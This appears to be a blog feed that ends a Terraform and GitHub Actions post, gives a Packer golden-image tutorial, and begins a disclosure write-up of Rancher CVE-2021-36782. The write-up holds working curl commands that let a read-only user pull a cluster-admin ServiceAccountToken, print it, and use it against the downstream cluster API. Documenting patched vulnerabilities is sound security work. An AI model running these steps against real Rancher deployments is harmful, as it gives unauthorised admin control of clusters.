After a couple of seconds, it should show:</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2024/01/image-3.png" class="kg-image" alt="Bootstrapping Terraform GitHub Actions for AWS" loading="lazy" width="938" height="385" srcset="https://fe.ax/content/images/size/w600/2024/01/image-3.png 600w, https://fe.ax/content/images/2024/01/image-3.png 938w"><figcaption><span style="white-space: pre-wrap;">Succeeded action allowing merge</span></figcaption></figure><p>Check your plan, followed by a squash and merge. Don&apos;t forget to delete the branch. Immediately after merging, another plan should start running, detecting changes and triggering the <code>apply</code> job. It should look like:</p><figure class="kg-card kg-image-card"><img src="https://fe.ax/content/images/2024/01/image-1.png" class="kg-image" alt="Bootstrapping Terraform GitHub Actions for AWS" loading="lazy" width="638" height="713" srcset="https://fe.ax/content/images/size/w600/2024/01/image-1.png 600w, https://fe.ax/content/images/2024/01/image-1.png 638w"></figure><p>Check the plan again, approve the deployment, and &#x1F389;GitHub Actions is managing its resources to be able to manage its resources!</p><h2 id="destroying-everything">Destroying everything</h2><p>If you want to destroy everything again, you must remove the <code>lifecycle_policy</code> first, or Terraform will tell you you can&apos;t destroy anything.</p><p>The best route is to delete the <code>backend.tf</code> file and migrate the remote state to your local machine. This is needed because Terraform will be destroying its S3 state and DynamoDB lock table, losing your state in the middle of a run.</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">marco@DESKTOP-2RFLM66:~/tf-aws-iam/terraform$ rm backend.tf
marco@DESKTOP-2RFLM66:~/tf-aws-iam/terraform$ tf init -migrate-state

Initializing the backend...
Terraform has detected you&apos;re unconfiguring your previously set &quot;s3&quot; backend.
Do you want to copy existing state to the new backend?
  Pre-existing state was found while migrating the previous &quot;s3&quot; backend to the
  newly configured &quot;local&quot; backend. No existing state was found in the newly
  configured &quot;local&quot; backend. Do you want to copy this state to the new &quot;local&quot;
  backend? Enter &quot;yes&quot; to copy and &quot;no&quot; to start with an empty state.

  Enter a value: yes



Successfully unset the backend &quot;s3&quot;. Terraform will now operate locally.
Initializing modules...

Initializing provider plugins...
- Reusing previous version of hashicorp/random from the dependency lock file
- Reusing previous version of hashicorp/local from the dependency lock file
- Reusing previous version of hashicorp/aws from the dependency lock file
- Using previously-installed hashicorp/aws v4.37.0
- Using previously-installed hashicorp/random v3.6.0
- Using previously-installed hashicorp/local v2.2.2

Terraform has been successfully initialized!

You may now begin working with Terraform. Try running &quot;terraform plan&quot; to see
any changes that are required for your infrastructure. All Terraform commands
should now work.

If you ever set or change modules or backend configuration for Terraform,
rerun this command to reinitialize your working directory. If you forget, other
commands will detect it and remind you to do so if necessary.</code></pre><figcaption><p><span style="white-space: pre-wrap;">Terraform migrate</span></p></figcaption></figure><p>When the state is back on your local machine, destroy everything using <code>terraform destroy</code>, and everything will be completely removed.</p><h2 id="conclusion">Conclusion</h2><p>I think using GitHub as a place to manage anything and everything that&apos;s in your account is the only way to go. Clickopsing results in rogue resources that cannot be managed.</p><p>Whenever I have clickopsed things in a testing account, I use the <a href="https://github.com/rebuy-de/aws-nuke">aws-nuke</a> script to find and remove all leftover AWS resources.</p><p>Further enhancements could be added to this setup, like making sure that the <code>plan</code> job only has read-only access, and the <code>apply</code> job with read-write access can only be run from the main branch.</p><h2 id="versions-used">Versions used</h2><pre><code class="language-plaintext">Terraform 1.7.0</code></pre>]]></content:encoded></item><item><title><![CDATA[Creating a golden image with Packer]]></title><description><![CDATA[Using Packer to generate a golden image for a dev environment on AWS. How to use Packer and create an IAM role and policy for it using Terraform.]]></description><link>https://fe.ax/packer-golden-image/</link><guid isPermaLink="false">63e5585958220f005de16142</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 08 Mar 2023 22:00:49 GMT</pubDate><content:encoded><![CDATA[<p><a href="https://www.packer.io/">Packer</a> is a tool to automate the build process for machine images. I&apos;ve started looking into Packer to generate a <a href="https://www.redhat.com/en/topics/linux/what-is-a-golden-image">golden image</a>. Using a golden image lets me quickly set up a fresh development environment without keeping the EC2 instance for long periods and thinking about configuration drift. 
Fixing an issue can be as easy as recreating the EC2 instance. Besides that, sharing your environment with others and experimenting with different setups is made easy.</p><p>The GitHub repo for this blog article can be found <a href="https://github.com/fe-ax/packer-blog">here</a>.</p><h2 id="getting-started">Getting started</h2><p>Building machine images for AWS can be a time-consuming and error-prone process, but with Packer, you can automate the entire process. Packer is a powerful tool that allows you to create golden images for your development environment with just a few simple steps:</p><ol><li>Booting an existing AMI image</li><li>Running some commands over SSH</li><li>Shutting it down</li><li>Taking a snapshot</li><li>Creating an AMI from the snapshot</li><li>Cleaning up</li></ol><p>It&apos;s that simple, but Packer will automate these simple tasks. You can also use Packer to build against multiple platforms and architectures, which can be helpful when running on AWS Graviton instances like the <a href="https://aws.amazon.com/ec2/instance-types/t4/">t4g</a> and x86 like <a href="https://aws.amazon.com/ec2/instance-types/t3/">t3</a> or <a href="https://aws.amazon.com/ec2/instance-types/t3/">t3a</a>.</p><p>I&apos;ve gone to some lengths to create a separate role for Packer in AWS IAM. You can easily strip it out if you want to use your all-mighty admin user.</p><h3 id="installing-packer">Installing Packer</h3><p>As usual, with modern commercial tools, the <a href="https://developer.hashicorp.com/packer/downloads">installation is straightforward</a>.</p><pre><code class="language-bash">wget -O- https://apt.releases.hashicorp.com/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/hashicorp-archive-keyring.gpg
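# Optional: verify the fingerprint of the key installed above before
# trusting the repository, e.g.:
#   gpg --no-default-keyring --keyring /usr/share/keyrings/hashicorp-archive-keyring.gpg --fingerprint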
echo &quot;deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main&quot; | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt update &amp;&amp; sudo apt install packer</code></pre><p>You can test Packer by running the following: <code>packer version</code></p><h3 id="iam-policy-and-role-for-packer-in-aws">IAM policy and role for Packer in AWS</h3><p>If you don&apos;t want to create IAM policies and choose to use your own AWS account, you can skip this part. Using an IAM role is particularly effective when Packer runs from an EC2 instance. I used an IAM role rather than our admin user for security reasons. If we run Packer from our local machine, it will assume the IAM role we&apos;ve created, which has limited permissions. This reduces the risk of accidental exposure of our AWS credentials.</p><p>While using an IAM group might seem more straightforward, it has some drawbacks. We&apos;ll need an IAM role if we eventually want to use EC2 to build EC2 images. Additionally, using an IAM role is more secure, as it allows us to limit the permissions of Packer to only what it needs. Packer also provides a <a href="https://developer.hashicorp.com/packer/plugins/builders/amazon/chroot">chroot builder</a>, which uses a continuously running machine. It should be faster and able to leverage the IAM role we&apos;re creating. This is out of the scope of this blog post, however.</p><p>We can find the needed IAM policy <a href="https://developer.hashicorp.com/packer/plugins/builders/amazon#iam-task-or-instance-role">here</a>. It gives a lot of privileges. I&apos;ve read <a href="https://blog.stefan-koch.name/2021/05/16/restricted-packer-aws-permissions">this article</a> by <em>Stefan Koch</em> about reducing the privileges required but did not implement it here. Not implementing Stefan&apos;s way is quicker but breaks the principle of least privilege. Imagine a pipeline running with these privileges and accidentally exposing its credentials. It&apos;s okay for development but not for production. 
Also, consider dedicating a specific AWS account to building AMIs if you have many of them.</p><h3 id="using-terraform-to-create-iam-resources">Using Terraform to create IAM resources</h3><p>We can easily manage and clean up the privileges handed out by leveraging infrastructure as code to create IAM resources. It also allows us to collaborate with others by using git, giving us version control. You can find the resulting Terraform config in my <a href="https://github.com/fe-ax/packer-blog">GitHub repository</a>.</p><p>To gain the privileges needed to build images with Packer, we need a couple of Terraform IAM resources:</p><figure class="kg-card kg-image-card kg-card-hascaption"><a href="https://fe.ax/content/images/size/w1000/2023/01/download--3--1.png"><img src="https://fe.ax/content/images/2023/03/chrome_2023-03-12_20-06-55.png" class="kg-image" alt loading="lazy" width="2000" height="674" srcset="https://fe.ax/content/images/size/w600/2023/03/chrome_2023-03-12_20-06-55.png 600w, https://fe.ax/content/images/size/w1000/2023/03/chrome_2023-03-12_20-06-55.png 1000w, https://fe.ax/content/images/size/w1600/2023/03/chrome_2023-03-12_20-06-55.png 1600w, https://fe.ax/content/images/size/w2400/2023/03/chrome_2023-03-12_20-06-55.png 2400w" sizes="(min-width: 720px) 720px"></a><figcaption><span style="white-space: pre-wrap;">Dependency tree based on </span><a href="https://github.com/pcasteran/terraform-graph-beautifier/tree/master"><span style="white-space: pre-wrap;">Terraform graph beautifier</span></a></figcaption></figure><p>According to <a href="https://registry.terraform.io/providers/hashicorp/aws/2.33.0/docs/guides/iam-policy-documents">Terraform</a>:</p><blockquote>The recommended approach to building AWS IAM policy documents within Terraform is the highly customizable <a href="https://registry.terraform.io/providers/hashicorp/aws/2.33.0/docs/guides/iam-policy-documents#aws_iam_policy_document-data-source"><code>aws_iam_policy_document</code> data 
source</a>.</blockquote><p>That is a lot of resource blocks for just one IAM role. I created my current IAM policies by hand while playing with them, but now I have to clean them up.</p><blockquote>To confirm deletion, enter the policy name in the text input field.</blockquote><p>After cleaning up, I ran the Terraform module creating the visualized resources above. It also writes a file named: <code>packer.pkrvar.hcl</code>. I now have a <em>packer</em> user that can create AMIs for me. Controlled and managed by a Terraform config, written as code.</p><h3 id="preparing-and-validating-packer">Preparing and validating Packer</h3><p>We can now create the Packer build file. I called it <code>aws-k3s.pkr.hcl</code>, and you can find it in the <a href="https://github.com/fe-ax/packer-blog">GitHub repository</a>.</p><p>The variables are read from the file Terraform just created (<code>packer.pkrvar.hcl</code>). If you skipped that part, you need to fill it in yourself like this:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">packer_access_key = &quot;my-access-key&quot;
packer_secret_key = &quot;my-secret-key&quot;
packer_region     = &quot;eu-central-1&quot;
packer_role_arn   = &quot;arn:aws:iam::123456789012:role/packer_role&quot;
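# (example values; the Terraform config from this post generates this file)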
</code></pre><figcaption><p><span style="white-space: pre-wrap;">packer.pkrvar.hcl</span></p></figcaption></figure><p>The main Packer file refers to these variables in the <code>source &quot;amazon-ebs&quot; &quot;ubuntu&quot;</code> resource. This resource selects one of the builders, which can be found under the <a href="https://developer.hashicorp.com/packer/plugins">plugins section of the documentation</a>. We&apos;re using the Amazon EC2 EBS builder for now.</p><h3 id="preparing-images-with-provisioners">Preparing images with provisioners</h3><p>Most Packer setups use the <a href="https://developer.hashicorp.com/packer/docs/provisioners/shell">Shell provisioner</a>. This way, Packer runs a script on the template source machine over SSH, which differs from the cloud-init we&apos;ll later use to initialize an instance running this image.</p><p>For Ubuntu, it&apos;s essential to include the first line:</p><pre><code class="language-bash">cloud-init status --wait</code></pre><p>If you don&apos;t wait for it to finish, some files that are still being created by the post-first-boot scripts will not be available yet, and tools like APT can show issues. More about this <a href="https://developer.hashicorp.com/packer/docs/debugging#issues-installing-ubuntu-packages">here</a>.</p><p>The current configuration only tests the build since the variable <code>skip_create_ami</code> is set to true. This is an important setting when testing, as it doesn&apos;t create an actual AMI after it&apos;s done. You can immediately set the variable <code>skip_create_ami</code> to false if you&apos;re not changing the provisioner.</p><p>You can check the Packer config by running the following:</p><pre><code class="language-bash">marco@DESKTOP:~/ebpf-xdp-dev/packer$ packer validate -var-file=packer.pkrvar.hcl aws-k3s.pkr.hcl 
The configuration is valid.
marco@DESKTOP:~/ebpf-xdp-dev/packer$ packer build -var-file=packer.pkrvar.hcl aws-k3s.pkr.hcl 
k3s.amazon-ebs.ubuntu: output will be in this color.

==&gt; k3s.amazon-ebs.ubuntu: Prevalidating any provided VPC information
==&gt; k3s.amazon-ebs.ubuntu: Prevalidating AMI Name: ebpf-xdp-dev-2023-01-30-17-54-28
    k3s.amazon-ebs.ubuntu: Found Image ID: ami-12a3456c325f02ab
==&gt; k3s.amazon-ebs.ubuntu: Creating temporary keypair: packer_12r18272-21d6-f24f-fb33-bc4e2f50e00a
==&gt; k3s.amazon-ebs.ubuntu: Creating temporary security group for this instance: packer_9217wegf9e-b58b-4acc-d18e-2b19ad93bc96
==&gt; k3s.amazon-ebs.ubuntu: Authorizing access to port 22 from [0.0.0.0/0] in the temporary security groups...
==&gt; k3s.amazon-ebs.ubuntu: Launching a source AWS instance...
    k3s.amazon-ebs.ubuntu: Adding tag: &quot;Creator&quot;: &quot;Packer&quot;
    k3s.amazon-ebs.ubuntu: Adding tag: &quot;Creator&quot;: &quot;Packer&quot;
    k3s.amazon-ebs.ubuntu: Instance ID: i-04db1b92a25d2ede6</code></pre><p>You can change the variable <code>skip_create_ami</code> to false if everything is correct and rerun it. This will do an entire run. The longest time will be spent in the snapshotting phase, as can be seen in a timetable here:</p><figure class="kg-card kg-code-card"><pre><code class="language-plaintext">00:00-00:00 - Prevalidation
00:00-00:01 - Creating keypair &amp; security group
00:01-00:02 - Launching a source AWS instance
00:02-00:27 - Connected to SSH and running provisioning script
00:27-01:37 - Stopping the source instance
01:37-08:56 - Creating AMI (creating snapshot is included in this step)
08:56-09:13 - Cleaning up</code></pre><figcaption><p><span style="white-space: pre-wrap;">Timetable for Packer run</span></p></figcaption></figure><p>As you can see, almost 80% of the time is spent waiting on AWS for the AMI to become ready. This is why it&apos;s recommended to use the <code>skip_create_ami</code> variable. Fast iterations of testing are necessary to reach your goal quickly, and with the chroot builder, the iterations could be even quicker.</p><h3 id="costs">Costs</h3><p>Just like with a stopped EC2 instance, you have to pay a fee for storing EBS snapshots. This snapshot has to exist as long as you&apos;re holding on to that AMI. The costs for this are approximately <a href="https://aws.amazon.com/ebs/pricing/">$0.05 per GB per month</a>.</p><blockquote>For my single image of 8GB, I&apos;ll pay $0.62 per 31-day month.</blockquote><p>Remember to <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ami-deprecate.html">set up AMI deprecation</a> and deregistration if you&apos;re creating images on a schedule. $0.62 isn&apos;t much, but run this daily, and you&apos;ll pay $19.22 after a month.</p><p>This is just a little cheaper than holding on to a stopped EC2&apos;s EBS volume at $0.0952 per GB per month. 
However, that EC2 volume might be three to four times larger than the image we&apos;ve created to prevent disk space issues while running.</p><p>Especially when using EBS type io2 instead of gp3, it can be much cheaper to throw the volume away and recreate it when needed, for example, during the auto-scaling of EC2 instances.</p><h3 id="final-thoughts-on-packer">Final thoughts on Packer</h3><p>After exploring Packer and the golden image principle, I am convinced this workflow is a valuable addition to my toolkit.</p><p>Using Packer and AMIs can help maintain consistency and improve collaboration in a project, especially when multiple team members are involved.</p><p>Another advantage of Packer and AMIs is the ability to quickly restore an instance to its original state in case of issues.</p><p>However, it&apos;s worth noting that starting an EC2 instance from scratch using an AMI can take longer than just starting an instance. In some cases, it may be more efficient to simply start and stop instances. Using a combination of both will give you the best of both worlds.</p>]]></content:encoded></item><item><title><![CDATA[Write-up of CVE-2021-36782: Exposure of credentials in Rancher API]]></title><description><![CDATA[A write-up of CVE-2021-36782. This vulnerability exposes Rancher's kontainer-engine's ServiceAccountToken, which can be used for privilege escalation.]]></description><link>https://fe.ax/cve-2021-36782/</link><guid isPermaLink="false">6353f02e07faa6007908d294</guid><category><![CDATA[Rancher]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 14 Dec 2022 12:45:34 GMT</pubDate><content:encoded><![CDATA[<p>It has been a while since the last post on my blog. In April, I found an issue in the <a href="https://github.com/rancher/rancher">Rancher</a> software, which is used to provision and manage Kubernetes clusters. We&apos;re four months past a published patched version, and I wanted to do a little write-up. 
It&apos;s not advisable to follow along using a production cluster. I&apos;ve put an easy way to launch a Rancher cluster with Terraform at the bottom so you can follow along.</p><h2 id="summary">Summary</h2><p>The issue caused an important Kubernetes <a href="https://kubernetes.io/docs/reference/access-authn-authz/authentication/#service-account-tokens">ServiceAccountToken</a> to be exposed to low-privileged users. The exposed token can access downstream clusters as admin. The vulnerability is considered critical, received a CVSS score of 9.9, and was published under <a href="https://github.com/rancher/rancher/security/advisories/GHSA-g7j7-h4q8-8w2f">this security advisory</a>. On 7 April 2022, I sent a responsible disclosure of this issue, including a proof of concept, to Rancher. A quick confirmation of receipt was sent back 45 minutes later, and about 13 hours later, they confirmed the issue and started working on a fix, a very quick turnaround.</p><blockquote><em>Hi Marco.<br><br>Thank you once again for reporting this issue directly to us and for the excellent PoC. This helped us to quickly evaluate and confirm the issue, which affects Rancher versions 2.6.4 and 2.5.12.<br><br>We started working on a fix and will release in the upcoming versions of Rancher. It will not be publicly announced until all supported Rancher versions are patched. We will communicate to you in advance before we release the latest fixed version.<br><br>Please let us know if you have any questions.<br><br>Thanks,</em></blockquote><p>As time passed, Rancher kept me up to date about the fix they were working on. On 19 August 2022, Rancher released a patched version, version 2.6.7.</p><p>In this blog article, I want to explain the vulnerability the best I can while providing a way to follow along.</p><h2 id="the-service-account">The service account</h2><p>Rancher uses Kubernetes service accounts to access other clusters. 
There are two relevant service accounts I want to talk about.</p><p>The first one is the Rancher user&apos;s token. A user created in Rancher gets a service account bound to specific roles granted on a particular cluster. Because it&apos;s bound to specific roles, its privileges are limited.</p><p>For demonstration, I&apos;ve created a user named &quot;readonlyuser&quot;, and this is what it can do:</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2022/11/image-2.png" class="kg-image" alt loading="lazy" width="743" height="318" srcset="https://fe.ax/content/images/size/w600/2022/11/image-2.png 600w, https://fe.ax/content/images/2022/11/image-2.png 743w"><figcaption><span style="white-space: pre-wrap;">kubectl auth can-i --list</span></figcaption></figure><p>This user has access to Rancher&apos;s predefined role <em>&quot;view workloads&quot; </em>in the project <em>&quot;extraproject&quot;. </em>Only one namespace is currently bound to this project, called <em>&quot;foo&quot;</em>, meaning the user has almost no access and, therefore, doesn&apos;t see many objects in the Rancher dashboard.</p><p>This user uses its service account token to gain this access. Since a Rancher user would normally proxy API calls through Rancher&apos;s <em>cluster router</em>, the user doesn&apos;t see this service account token. 
When you download the kubeconfig file from the UI, you do see this token.</p><p>Rancher also uses a service account token for its <a href="https://github.com/rancher/rancher/tree/release/v2.7/pkg/kontainer-engine">kontainer-engine</a> to manage the downstream clusters and gets this token from the API, as can be seen here:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/rancher/rancher/blob/9b2f2ae0e0d89f16580cd7767a52a6d9b5230fda/pkg/clustermanager/manager.go#L173"><div class="kg-bookmark-content"><div class="kg-bookmark-title">rancher/manager.go at 9b2f2ae0e0d89f16580cd7767a52a6d9b5230fda &#xB7; rancher/rancher</div><div class="kg-bookmark-description">Complete container management platform. Contribute to rancher/rancher development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">rancher</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/83c09ad19f41c4ad1af141e19e23c8199a92a105f3ce95759a4d4174f83226e7/rancher/rancher" alt></div></a></figure><p>This service account is just like the user&apos;s service account but is bound to the <em>cluster-admin</em> role and shouldn&apos;t be available to regular users.</p><h2 id="accessing-ranchers-service-account-token">Accessing Rancher&apos;s service account token</h2><p>Rancher renders things using javascript and API calls from the browser. This is visible when you log into the Rancher dashboard and open the developer console. They&apos;ve written dynamically generated forms and lists based on schemas. 
For example, Rancher has a view for <em>workloads,</em> and when you open it, it&apos;ll call the Kubernetes API for data to populate the view with the returned data.</p><p>One of the used API calls is <code>/v1/management.cattle.io.cluster</code> for information about the clusters the user can see. You can investigate this by opening the API path in the browser or immediately requesting the information using curl.</p><pre><code class="language-bash">BASEURL=&quot;https://rancher.1...4.sslip.io&quot;

# Request UI token, or create API token manually
TOKEN=$(curl -s -k -XPOST \
  -d &apos;{&quot;description&quot;:&quot;UI session&quot;,\
  &quot;responseType&quot;:&quot;token&quot;, \
  &quot;username&quot;:&quot;readonlyuser&quot;, \
  &quot;password&quot;:&quot;readonlyuserreadonlyuser&quot;}&apos; \
  ${BASEURL}/v3-public/localProviders/local?action=login \
  | jq &apos;.token&apos; -r)
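
# The status object requested below includes serviceAccountToken:
# the kontainer-engine token, not the read-only user&apos;s own token.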

curl -s -k -XGET \
  -H &quot;Authorization: Bearer $TOKEN&quot; \
  ${BASEURL}/v1/management.cattle.io.clusters \
  | jq &apos;.data[] | select(.spec.displayName==&quot;extra-cluster&quot;) | .status&apos;</code></pre><p>The service account token you receive in the <code>status.serviceAccountToken</code> field of this object is not the user&apos;s token but the kontainer-engine&apos;s token. If we decode the JWT token, we see <a href="https://jwt.io/#debugger-io?token=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNkZ2h2QkxHMUR5cVIyV1BUYlNaMUFEcDg5UmNBQ3lxYlRhOWpwNGhHckEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tdHBqc3IiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjIzMmU1MjE4LTkyNDgtNDEyOS04OGUwLTRmZjlkOTk2OTI3MSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.C57WQ-tzUBce3R1Dfs7KU3KueTLor_D4MqAsQIwp9udxjORin-zmFCJXHyTysQI8d1ocisSnJE-ZNb-PvjzixGzDIvZcjA0a2YvFqA4Tmc5yyC4VzM_nZgrY8M5yBxTTdIZNoka9qCdpdavL9U4UuYvGDS5HXQ4_K-eSGb95VoIgzH355acjZEN6yv_d4fXyoqIYahAiwmlnWvFALQOqOoCzYrmHst-HoFI1AmXE_N4PZRVYaOoAlBia0Q2Fcl808arx9iGqi7UdKjfhqurb5-Aws8XNxrrMZoOCJYPu40NEjkX5yr517oCxk1I2frfUeO5jTxhexyqImzoOcl4TYA">this is the result</a>.</p><figure class="kg-card kg-code-card"><pre><code class="language-json">{
  &quot;iss&quot;: &quot;kubernetes/serviceaccount&quot;,
  &quot;kubernetes.io/serviceaccount/namespace&quot;: &quot;cattle-system&quot;,
  &quot;kubernetes.io/serviceaccount/secret.name&quot;: &quot;kontainer-engine-token-tpjsr&quot;,
  &quot;kubernetes.io/serviceaccount/service-account.name&quot;: &quot;kontainer-engine&quot;,
  &quot;kubernetes.io/serviceaccount/service-account.uid&quot;: &quot;232e5218-9248-4129-88e0-4ff9d9969271&quot;,
  &quot;sub&quot;: &quot;system:serviceaccount:cattle-system:kontainer-engine&quot;
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">Decoded JWT token</span></p></figcaption></figure><p>This shows that the subject of this token is <em>kontainer-engine,</em> and it lives in the <em>cattle-system</em> namespace.</p><h2 id="using-the-jwt-token">Using the JWT token</h2><p>To use this JWT token, we need direct network access to the cluster&apos;s kube-api, as the Rancher proxy will not recognize the token. We can find the Kubernetes API endpoint from the browser or use the same API with curl.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">BASEURL=&quot;https://rancher.1...4.sslip.io&quot;

# Request UI token, or create API token manually
TOKEN=$(curl -s -k -XPOST \
  -d &apos;{&quot;description&quot;:&quot;UI session&quot;,\
  &quot;responseType&quot;:&quot;token&quot;, \
  &quot;username&quot;:&quot;readonlyuser&quot;, \
  &quot;password&quot;:&quot;readonlyuserreadonlyuser&quot;}&apos; \
  ${BASEURL}/v3-public/localProviders/local?action=login \
  | jq &apos;.token&apos; -r)

# Fetch API endpoint downstream cluster
curl -s -k -XGET \
  -H &quot;Authorization: Bearer $TOKEN&quot; \
  ${BASEURL}/v1/management.cattle.io.clusters \
  | jq &apos;.data[] | select(.spec.displayName==&quot;extra-cluster2&quot;) | .status.apiEndpoint&apos; -r
  
# Example response: https://1...2:6443</code></pre><figcaption><p><span style="white-space: pre-wrap;">Fetching the downstream Kubernetes API endpoint</span></p></figcaption></figure><p>The endpoint is different from the base URL and should end in port 6443. If the downstream cluster is protected from direct accessing, you need to continue from the Rancher-provided shell in the top-right corner of the UI. Note that you&apos;ll need to <a href="https://github.com/moparisthebest/static-curl/releases/latest">download a precompiled version of curl</a>.</p><p>You can continue using curl calls or set up kubectl to access the cluster. I will do the first call using curl, then set up kubectl to show both ways.</p><p>When requesting the ClusterRoleBindings for <em>system:serviceaccount:cattle-system:kontainer-engine</em>, we see that this service account is bound to the <em>cluster-admin</em> ClusterRole.</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">TOKEN=&quot;eyJhbGciOiJSUzI1NiIsImtpZCI6IlNkZ2h2QkxHMUR5cVIyV1BUYlNaMUFEcDg5UmNBQ3lxYlRhOWpwNGhHckEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tdHBqc3IiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjIzMmU1MjE4LTkyNDgtNDEyOS04OGUwLTRmZjlkOTk2OTI3MSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.C57WQ-tzUBce3R1Dfs7KU3KueTLor_D4MqAsQIwp9udxjORin-zmFCJXHyTysQI8d1ocisSnJE-ZNb-PvjzixGzDIvZcjA0a2YvFqA4Tmc5yyC4VzM_nZgrY8M5yBxTTdIZNoka9qCdpdavL9U4UuYvGDS5HXQ4_K-eSGb95VoIgzH355acjZEN6yv_d4fXyoqIYahAiwmlnWvFALQOqOoCzYrmHst-HoFI1AmXE_N4PZRVYaOoAlBia0Q2Fcl808arx9iGqi7UdKjfhqurb5-Aws8XNxrrMZoOCJYPu40NEjkX5yr517oCxk1I2frfUeO5jTxhexyqImzoOcl4TYA&quot;
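
# --- Optional offline check (helper function not in the original post) ---
# A JWT is three dot-separated base64url segments; this decodes the payload
# segment so you can confirm the token's subject before using it.
b64url_decode() {
  local s="${1//-/+}"
  s="${s//_//}"
  while [ $(( ${#s} % 4 )) -ne 0 ]; do s="${s}="; done
  printf '%s' "$s" | base64 -d
}
# Example (uses the TOKEN defined above):
#   b64url_decode "$(printf '%s' "$TOKEN" | cut -d. -f2)" | jq -r '.sub'
#   prints: system:serviceaccount:cattle-system:kontainer-engine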

curl -s -k -X GET  -H &quot;Authorization: Bearer $TOKEN&quot; \
  https://--:6443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
  | jq &apos;.items[] | select(.subjects[].name==&quot;kontainer-engine&quot;)&apos;
{
  &quot;metadata&quot;: {
    &quot;name&quot;: &quot;system-netes-default-clusterRoleBinding&quot;,
    &quot;uid&quot;: &quot;cb0a6201-6c70-4186-ac82-97761169859a&quot;,
    &quot;resourceVersion&quot;: &quot;803&quot;,
    &quot;creationTimestamp&quot;: &quot;2022-11-24T20:21:08Z&quot;,
    &quot;managedFields&quot;: [
      {
        &quot;manager&quot;: &quot;Go-http-client&quot;,
        &quot;operation&quot;: &quot;Update&quot;,
        &quot;apiVersion&quot;: &quot;rbac.authorization.k8s.io/v1&quot;,
        &quot;time&quot;: &quot;2022-11-24T20:21:08Z&quot;,
        &quot;fieldsType&quot;: &quot;FieldsV1&quot;,
        &quot;fieldsV1&quot;: {
          &quot;f:roleRef&quot;: {},
          &quot;f:subjects&quot;: {}
        }
      }
    ]
  },
  &quot;subjects&quot;: [
    {
      &quot;kind&quot;: &quot;ServiceAccount&quot;,
      &quot;name&quot;: &quot;kontainer-engine&quot;,
      &quot;namespace&quot;: &quot;cattle-system&quot;
    }
  ],
  &quot;roleRef&quot;: {
    &quot;apiGroup&quot;: &quot;rbac.authorization.k8s.io&quot;,
    &quot;kind&quot;: &quot;ClusterRole&quot;,
    &quot;name&quot;: &quot;cluster-admin&quot;
  }
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">Accessing the cluster role bindings with the kontainer-engine&apos;s JWT token</span></p></figcaption></figure><p>Service accounts bound to the <a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/#:~:text=Description-,cluster%2Dadmin,-system%3Amasters%20group">cluster-admin</a> cluster role have super-user access to the Kubernetes cluster. Therefore we can do anything to the cluster we want using this token. Let&apos;s put this in a kubeconfig file.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell"># The JWT token
